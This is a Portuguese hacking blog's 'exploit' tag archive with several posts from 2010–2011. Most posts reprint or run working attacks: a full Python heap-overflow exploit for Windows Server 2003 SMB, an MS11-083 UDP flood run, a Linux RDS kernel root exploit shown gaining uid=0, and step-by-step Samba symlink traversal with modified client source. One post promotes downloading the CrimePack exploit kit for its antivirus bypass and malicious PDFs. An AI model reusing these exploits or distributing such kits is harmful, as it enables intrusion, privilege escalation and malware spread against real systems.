exploit | L8Howto

Tag Archive: exploit

PoC MS11-083

Filed Under: Hacking, Security by admin — Leave a comment

14 de novembro de 2011

Informado pela sans..

An integer overflow in the TCP/IP stack allows random code execution from a stream of UDP packets sent to a closed port. Permission for the attacker are at kernel level.

Depois de sair o exploit para a vulnerabilidade MS11-083 realizei a prova de conceito para verificar o que ocorre na tal situação.

A Mirosoft informou que para se explorada será necessário enviar aproximadamente 2^32 pacotes UDP para obter êxito na exploração.

No lab temos um Debian que faz o ataque e o Windows 2003 Standard com 1Gb de memória RAM 4 CPU’s que será atacado.

O exploit divulgado publicamente: http://packetstormsecurity.org/files/106873/winnuke2011.sh.txt , utilizei somente o código em C .

Compilando….

debian:~/2003# gcc -lpthread MS11-083.c -o MS11-083

debian:~/2003# ./MS11-083
[+] MS11-083 DoS/PoC exploit
[!] Usage : ./MS11-083 <server> <port>

No Windows.. tudo sobre controle..

Antes do Ataque

Começamos o ataque…

debian:~/2003# ./MS11-083 192.168.10.131 1000
[+] MS11-083 DoS/PoC exploit
[-] Sending payload ‘ZSW”<kc’ULJ=VK%XE-cP0*%(‘bORT=”;D”[c=S'
[-] Thread number 0 started
[-] Sending payload ’60&a;%=^,7FKMc[D=J>90J6Y7DR]*PC<&8′.%) ‘
[-] Thread number 1 started
[-] Sending payload ‘dCJe-f+65f9@NJhH-c”!?XU% (7#TDOhjIa+`=_)’
[-] Thread number 2 started
[-] Sending payload ‘/;.S”0:#dd=kSACiD=S!OLO#V/ZLP<]L`?,/D$’
[-] Thread number 3 started
[-] Sending payload ‘”S.Q]=JOT” (8%O)-4bF+NeN I@**A<.Di/RV\5>’
[-] Thread number 4 started
[-] Sending payload ‘Ag0BMF”FF[ aB]*9*UQi<2H!8X&LieC>`U1AKQ7B’
[-] Thread number 5 started
[-] Sending payload ‘,=aTOe9-]”A&,B-;:b,f0<@BVX#VbM’WQD;K_f’
[-] Thread number 6 started
[-] Sending payload ‘AH2M R!h\+#H>e.VD-bDI;1″JJ’ JeQG6Sg2C’
[-] Thread number 7 started
[-] Sending payload ‘*X-KOSYQF!86#M53C^f1Z+jM=*+[.e56&0h)kiQ'
[-] Thread number 8 started

Em questão de segundos veremos o gráfico de performace do Windows..

Após o ataque

Em outro console temos a saída do tcpdump

debian:~/2003# tcpdump -X -vvv -i eth0 dst host 192.168.10.131
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
23:47:47.221788 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000: 4500 0045 0000 4000 4011 a454 c0a8 0a80 E..E..@.@..T….
0×0010: c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a …..}…1..bP]*
0×0020: 3b2e 5028 246a 5d3d 5632 273b 3a49 2156 ;.P($j]=V2′;:I!V
0×0030: 2069 3a2d 3725 5f22 5723 284d 5536 2741 .i:-7%_”W#(MU6′A
0×0040: 465a 4b4c 00                             FZKL.
23:47:47.221846 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000: 4500 0045 0000 4000 4011 a454 c0a8 0a80 E..E..@.@..T….
0×0010: c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a …..}…1..bP]*
0×0020: 3b2e 5028 246a 5d3d 5632 273b 3a49 2156 ;.P($j]=V2′;:I!V
0×0030: 2069 3a2d 3725 5f22 5723 284d 5536 2741 .i:-7%_”W#(MU6′A
0×0040: 465a 4b4c 00                             FZKL.
23:47:47.221850 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000: 4500 0045 0000 4000 4011 a454 c0a8 0a80 E..E..@.@..T….
0×0010: c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a …..}…1..bP]*
0×0020: 3b2e 5028 246a 5d3d 5632 273b 3a49 2156 ;.P($j]=V2′;:I!V
0×0030: 2069 3a2d 3725 5f22 5723 284d 5536 2741 .i:-7%_”W#(MU6′A
0×0040: 465a 4b4c 00                             FZKL.
23:47:47.221853 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000: 4500 0045 0000 4000 4011 a454 c0a8 0a80 E..E..@.@..T….
0×0010: c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a …..}…1..bP]*
0×0020: 3b2e 5028 246a 5d3d 5632 273b 3a49 2156 ;.P($j]=V2′;:I!V
0×0030: 2069 3a2d 3725 5f22 5723 284d 5536 2741 .i:-7%_”W#(MU6′A
0×0040: 465a 4b4c 00                             FZKL.
23:47:47.221856 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000: 4500 0045 0000 4000 4011 a454 c0a8 0a80 E..E..@.@..T….
0×0010: c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a …..}…1..bP]*
0×0020: 3b2e 5028 246a 5d3d 5632 273b 3a49 2156 ;.P($j]=V2′;:I!V
0×0030: 2069 3a2d 3725 5f22 5723 284d 5536 2741 .i:-7%_”W#(MU6′A
0×0040: 465a 4b4c 00                             FZKL.

Nesta situação temos somente 1 computador atacando, o script esta utilizando toda a CPU do Debian.

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
3541 root 20 0 273m 976 484 S 97.2 0.2 0:16.40 MS11-083

No atual lab não conseguimos causar um DoS no alvo, mas de acordo com os resultados vimos que isso seria possível seeeeeeeeee… o firewall estivesse desabilitado….

Agora vamos habilitar o firewall do windows, e voltaremos ao ataque e os gráficos…

Firewalled

Ou seja, o ataque pode ser mitigado sem muitos problemas. Para completar os 2^32 pacotes enviados levaria aproximadamente 52 dias, paramos por aqui sem a verdadeira prova que seria possível executar um código remotamente.

Mais informações sobre o Bug: http://technet.microsoft.com/en-us/security/bulletin/ms11-083

Resumindo, sempre firewall ativado e sistema atualizado!

Outro exploit e mais infos pode ser encontrado também em: http://blog.rootentropy.co.za/post/12567851289/ms11-083-traffic-capture

[]‘s

Sergito

Tags: 0day, 2003 server, Dos, exploit, Hacking

Comment

Kernel 2.6.30 Local Root Exploit

Filed Under: Ferramentas, Hacking, Linux, Security by admin — Leave a comment

3 de outubro de 2011

Mais um xploit para kernel 2.6.30....

http://1337day.com/exploits/16993

[]'s
Sérgito

Tags: 0day, exploit, Hacking

Comment

Crimepack Exploit kit Download

Filed Under: Ferramentas, Hacking, malware by admin — 2 Comments

13 de maio de 2011

Lançada nova versão do Exploit kit CrimePack (3.1.3), desta vez com algumas brincadeiras novas, dentre elas a exploração da vulnerabilidade do JRE na vítima e ofuscação do código bypassando possíveis AV’s.

Outro recurso novo é a criação de pdf’s maliciosos com diversas opções de conexões reversas e mutações evitando a detecção.

Vale a pena testar… antes de tudo, lembre-se!! vc irá precisar: Apache, PHP5, MySQL, libcurl, ioncube

No .zip contém instruções…

Download: Crimepack-3.1.3

[]‘s

Sergito

Tags: bypass, crimepack, exploit, Hacking, malware, tool

Comment

Microsoft WINS Service Remote Code Execution Vulnerability

Filed Under: Hacking, Windows by admin — Leave a comment

11 de maio de 2011

Depois de alguns longos meses, volto a postar por aqui, desta vez é um falha no serviço do wins do windows server, que permite a execução de código remotamente.

A falha somente caiu a público após o lançamento do patch, que pode ser baixado em: http://www.microsoft.com/technet/security/bulletin/MS11-035.mspx

Mais informações sobre a falha descoberta pelo Luigi Auriemma pode ser lida na securityfocus: http://www.securityfocus.com/bid/47730/info

Até o momento nenhum exploit lançado… até o momento… rsrsr

[]‘s

Sergito

Tags: 0day, exploit

Comment

MS Windows Server 2003 Remote Heap Overflow

Filed Under: Hacking, Security by admin — Leave a comment

15 de fevereiro de 2011

Sem muitos comentários, simples e direto, Windows 2003 server remote Heap Overflow !

####################################################################################
#MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
#Release date: 2011-02-14
#Anonymous Comment: Apologies if this puts a downer on the MSRC valentines
day sausage fest
#Author: Cupidon-3005
#Greet: Winny Thomas, Laurent Gaffie, h07
#Bug: Heap Overflow
#Remote Exploitability: Unlikely
#Local Exploitability: Likely
#Context: Broadcast, Pre-Auth
#Special Valentines Greetings: Ruben Santamarta, is your password still
"hijodeputa"? You look even more like a dumb fuck than you used to.
#From dailydave: [
https://lists.immunityinc.com/pipermail/dailydave/20110121/000057.html], So
your 31337 con is the only place to get 0day? Here's some pre-auth /
#broadcast 0day free for all on FD with 0% conference whoring, and punks are
welcome as well.
#####################################################################################
#Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from
ESI to EDI ...
#Code will look something like this:
#if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len =
TotalSize/sizeof(WCHAR) - 1; }
#-1 causes Len to go 0xFFFFFFFF
#Feel free to reuse this code without restrictions and ask Kingcope-Fag to
perform his FTP FU on SMB, he might have more luck than MS.
"
import socket,sys,struct
from socket import *

if len(sys.argv)<=4:
 sys.exit("""usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME
 example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah
AD-NETBIOS-NAME""")

ourip = sys.argv[1]
host = sys.argv[2]
srcname = sys.argv[3].upper()
dstname = sys.argv[4].upper()

ELEC            = "\x42\x4f\x00"
WREDIR          = "\x41\x41\x00"

def encodename(nbt,service):
    final = '\x20'+''.join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) +
ord('A')) for i in nbt])+((15 - len(nbt)) * str('\x43\x41'))+service
    return final

def lengthlittle(packet,addnum):
    length = struct.pack("<i", len(packet)+addnum)[0:2]
    return length

def lengthbig(packet,addnum):
    length = struct.pack(">i", len(packet)+addnum)[2:4]
    return length

def election(srcname):
    elec = "\x08"
    elec+= "\x09" #Be the boss or die
    elec+= "\xa8\x0f\x01\x20" #Be the boss or die
    elec+= "\x1b\xe9\xa5\x00" #Up time
    elec+= "\x00\x00\x00\x00" #Null, like SDLC
    elec+= srcname+"\x00"
    return elec

def smbheaderudp(op="\x25"):
    smbheader= "\xff\x53\x4d\x42"
    smbheader+= op
    smbheader+= "\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00\x00\x00\x00\x00\x00\x00"
    smbheader+=  "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    return smbheader

def
trans2mailslot(tid="\x80\x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="\MAILSLOT\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x00",pbrowser=""):
    packetbrowser  =  pbrowser
    packetmailslot = "\x01\x00"
    packetmailslot+= "\x00\x00"
    packetmailslot+= "\x02\x00"
    packetmailslot+= lengthlittle(packetbrowser+namepipe,4)
    packetmailslot+= namepipe +"\x00"
    packetdatagram = "\x11"
    packetdatagram+= "\x02"
    packetdatagram+= tid
    packetdatagram+= inet_aton(ip)
    packetdatagram+= "\x00\x8a"
    packetdatagram+= "\x00\xa7"
    packetdatagram+= "\x00\x00"
    packetdatagramname = encodename(sname,srcservice)
    packetdatagramname+= encodename(dname,dstservice)
    smbheader= smbheaderudp("\x25")
    packetrans2 = "\x11"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\xe8\x03\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4)
    packetrans2+= "\x03"
    packetrans2+= "\x00"
    andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2)
    lengthcalc =
packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetfinal =
packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetotalength = list(packetfinal)
    packetotalength[10:12] = lengthbig(lengthcalc,0)
    packetrans2final = ''.join(packetotalength)
    return packetrans2final

def sockbroad(host,sourceservice,destservice,packet):
   s = socket(AF_INET,SOCK_DGRAM)
   s.setsockopt(SOL_SOCKET, SO_BROADCAST,1)
   s.bind(('0.0.0.0', 138))
   try:
      packsmbheader = smbheaderudp("\x25")
      buffer0 =
trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe="\MAILSLOT\BROWSER",srcservice=sourceservice,
dstservice=destservice, pbrowser=packet)
      s.sendto(buffer0,(host,138))
   except:
      print "expected SDL error:", sys.exc_info()[0]
      raise

sockbroad(host,WREDIR,ELEC,election("A" * 410)) # -> Zing it! (between
~60->410)
print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time
ago...."

####################################################################################

by packetstormsecurity

[]'s

Sergito

Tags: 0day, 2003 server, exploit

Comment

Falha Kernel Linux 2.6

Filed Under: Hacking, Linux by admin — Leave a comment

1 de novembro de 2010

Já faz um tempinho que a falha caiu no mundo underground, e a algumas semanas foi a público, a falha em um módulo do kernel permite exploração e escalar privilégios. A falha descoberta pelo Dan Rosenberg, existente nas versões do kernel >= 2.6.30, afeta um módulo do kernel que facilmente pode ser explorada e assim obter o id=0.

Na securityfocus foi publicado juntamente com o exploit, porém foi preciso adicionar 2 linhas definindo o valor para umas variáveis quando compilado para o debian, são elas:

#define AF_RDS 21

#define PF_RDS AF_RDS

E vemos abaixo a exploração em um ubuntu..

trash@trash-desktop:~/k-2.6$ uname -r

2.6.32-21-generic

trash@trash-desktop:~/k-2.6$ ls

linux.c

trash@trash-desktop:~/k-2.6$ gcc linux.c -o linux

trash@trash-desktop:~/k-2.6$ ls

linux linux.c

trash@trash-desktop:~/k-2.6$ ./linux

[*] Linux kernel >= 2.6.30 RDS socket exploit

[*] by Dan Rosenberg

[*] Resolving kernel addresses…

[+] Resolved rds_proto_ops to 0xf81c9980

[+] Resolved rds_ioctl to 0xf81c3090

[+] Resolved commit_creds to 0xc016dcc0

[+] Resolved prepare_kernel_cred to 0xc016e000

[*] Overwriting function pointer…

[*] Triggering payload…

[*] Restoring function pointer…

[*] Got root!

# id

uid=0(root) gid=0(root)

Simples… Um alternativa é desabilitar o módulo RDS da inicialização do Kernel ou aplicar o patch que esta disponível via git…

# “alias net-pf-21 off” > /etc/modprobe.d/disable-rds

Download do exploit: linux.c

[]‘s

Sergito

Tags: 0day, exploit, Hacking

Comment

Microsoft Windows Local Privilege Escalation Vulnerability

Filed Under: Hacking, Security by admin — Leave a comment

6 de julho de 2010

Uma falha que afeta grande parte do windows Vista e 2008 server foi publicada recentemente juntamente com o seu exploit no securityfocus. A falha local explora diretamente o kernel do windows e se vulnerável escala privilégios, caso contrário pode causar um DoS. Vale a pena conferir e testar..

Vulnerable:

Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Business SP2
Microsoft Windows Vista Business SP1
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems 0
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems 0
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for 32-bit Systems 0

Mais info.. http://www.securityfocus.com/bid/41280/info

[]‘s

Sergito

Tags: 0day, exploit

Comment

Penetration Testing: Aprender Assembly?

Filed Under: Hacking, pentest by admin — Leave a comment

5 de abril de 2010

Vale a pena dar uma lida no post do HD Moore falando se os penetration tester de hoje devem saber asm ou não, nessa ele exemplificou o exploit do Gustavo Scotti no qual o shellcode estava com algumas instruções que, na minha opnião não deveriam estar ali presente. É um exploit antigo, de 2001, mas abre o olho do pessoal que tem o costume de pegar o código, compilar e run!!

Link: http://blog.metasploit.com/2010/04/penetration-testing-learn-assembly.html

[]‘s Sergito

Tags: asm, exploit, shellcode

Comment

Remote Code Execution Vulnerability on Microsoft Notepad

Filed Under: Sem categoria by admin — Leave a comment

7 de março de 2010

É isso aé gente, apenas um txt pode causar alguns estragos se realizado alguns procedimentos, como foi divulgado o PoC no site da secumania http://secumania.net/index.php?option=com_content&task=view&id=37&Itemid=1 A falha não esta no bloco de notas em si, mas nos componentes que ele carrega aproveitando a falha do HTML Help control ActiveX, divulgada na semana passada, por isso tome muito cuidado ao pressionar F1 pelas página da web por aé.

Uma explicação detalhada: mswin-notepad-vuln-adv

[]‘s Sergito

Tags: exploit, PoC

Comment

Samba 0day

Filed Under: Hacking by admin — Leave a comment

6 de fevereiro de 2010

O assunto do dia foi esse, depois que o kcope publicou o exploit do samba ontem (04-02-2010), muito semelhante a que ocorreu em 2004, fui testa-lo para ser assunto de mais um post aqui no blog. Quando explorado a falha, é possível listar, ler e copiar arquivos para o sistema atacado, não somente no diretório compartilhado pelo samba, mas sim todo o “/” do seu linux. Nos testes que realizei (Debian), só foi preciso criar um compartilhamento com permissão de escrita para todos, que é necessário para o xploit funcionar.

1) Mão na massa, primeiramente baixe o source do samba, eu utilizei a versão 3.4.5: http://samba.org/samba/ftp/stable/samba-3.4.5.tar.gz

2) Será necessário alterar um arquivo do source do samba e alterar um bloco como descrito abaixo:

vi ~/samba-3.4.5/source3/client/client.c

/****************************************************************************
UNIX symlink.
****************************************************************************/

static int cmd_symlink(void)
{
TALLOC_CTX *ctx = talloc_tos();
char *oldname = NULL;
char *newname = NULL;
char *buf = NULL;
char *buf2 = NULL;
char *targetname = NULL;
struct cli_state *targetcli;

if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
!next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
d_printf(“symlink <oldname> <newname>\n”);
return 1;
}
oldname = talloc_asprintf(ctx,
“%s”,               // << HERE modified
buf);
if (!oldname) {
return 1;
}
newname = talloc_asprintf(ctx,
“%s”,               // << HERE modified
buf2);
if (!newname) {
return 1;
}
/* COMENTE
oldname = talloc_asprintf(ctx,
“%s%s”,               // < modified (see above)
client_get_cur_dir(),       // < removed (see above)
buf);
if (!oldname) {
return 1;
}
newname = talloc_asprintf(ctx,
“%s%s”,               // < modified (see above)
client_get_cur_dir(),       // < removed (see above)
buf2);
if (!newname) {
return 1;
}
———————————————-*/

if (!cli_resolve_path(ctx, “”, auth_info, cli, oldname, &targetcli, &targetname)) {
d_printf(“link %s: %s\n”, oldname, cli_errstr(cli));
return 1;

}

if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
d_printf(“Server doesn’t support UNIX CIFS calls.\n”);
return 1;
}

if (!cli_unix_symlink(targetcli, targetname, newname)) {
d_printf(“%s symlinking files (%s -> %s)\n”,
cli_errstr(targetcli), newname, targetname);
return 1;
}

return 0;
}

——————————————————————————————————————————

Como visto acima, algumas linhas do bloco “UNIX symlink” foram alterados, a melhor opção é remover o bloco do arquivo original e colar o bloco acima no seu source.

3) Agora vamos compilar o samba:

# cd ~/samba-3.4.5/source3/

#./configure && make && make install

4) Localizar o diretório compartilhado:

# smbclient -s /etc/samba/smb.conf -L //192.168.48.128

Irá listar os diretórios compartilhados no alvo, no meu caso deu um problema com uma biblioteca no momento da execução, para resolver alterei a variável LD_LIBRARY_PATH.

# export LD_LIBRARY_PATH=/usr/local/samba/lib < local da lib do samba

5) Acessando o compartilhamento:

# smbclient -s /etc/samba/smb.conf //192.168.48.128/shared

A pasta compartilhada chama-se “shared”, lembrando, ela deverá ter permissão total de escrita para o guest.

6) Xploit!!

Vc irá cair no prompt do samba (smb: \>), se vc executar o “ls”, ele irá listar os arquivo de dentro da pasta compartilhada, mas e agora??

no prompt do samba digite: symlink ../../../../../ root

Executando o “ls” novamente, listará uma pasta chamada “root”, óóóóóóóóó!! Agora entre nela!

smb: \> cd root

smb: \root\> ls

UAUUU!! o conteúdo do “/” inteiro a disposição!! Agora é só navegar nas pastas e transferir arquivos!!

Esta 0day é de total crédito do kcope, autor de diversas 0day’s. (http://www.milw0rm.com/author/113 | http://twitter.com/Kingcope)

[]‘s Sergito

vi ~/samba-3.4.5/source3/client/client.c

Tags: 0day, exploit, samba

Comment

L8Howto

Tag Archive: exploit

PoC MS11-083

Kernel 2.6.30 Local Root Exploit

Crimepack Exploit kit Download

Microsoft WINS Service Remote Code Execution Vulnerability

MS Windows Server 2003 Remote Heap Overflow

Falha Kernel Linux 2.6

Microsoft Windows Local Privilege Escalation Vulnerability

Penetration Testing: Aprender Assembly?

Remote Code Execution Vulnerability on Microsoft Notepad

Samba 0day

Posts Recentes

Arquivos

About

Notícias

Contador

UserOnline

Comentários

Meta

fevereiro 2012
S	T	Q	Q	S	S	D
« nov
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29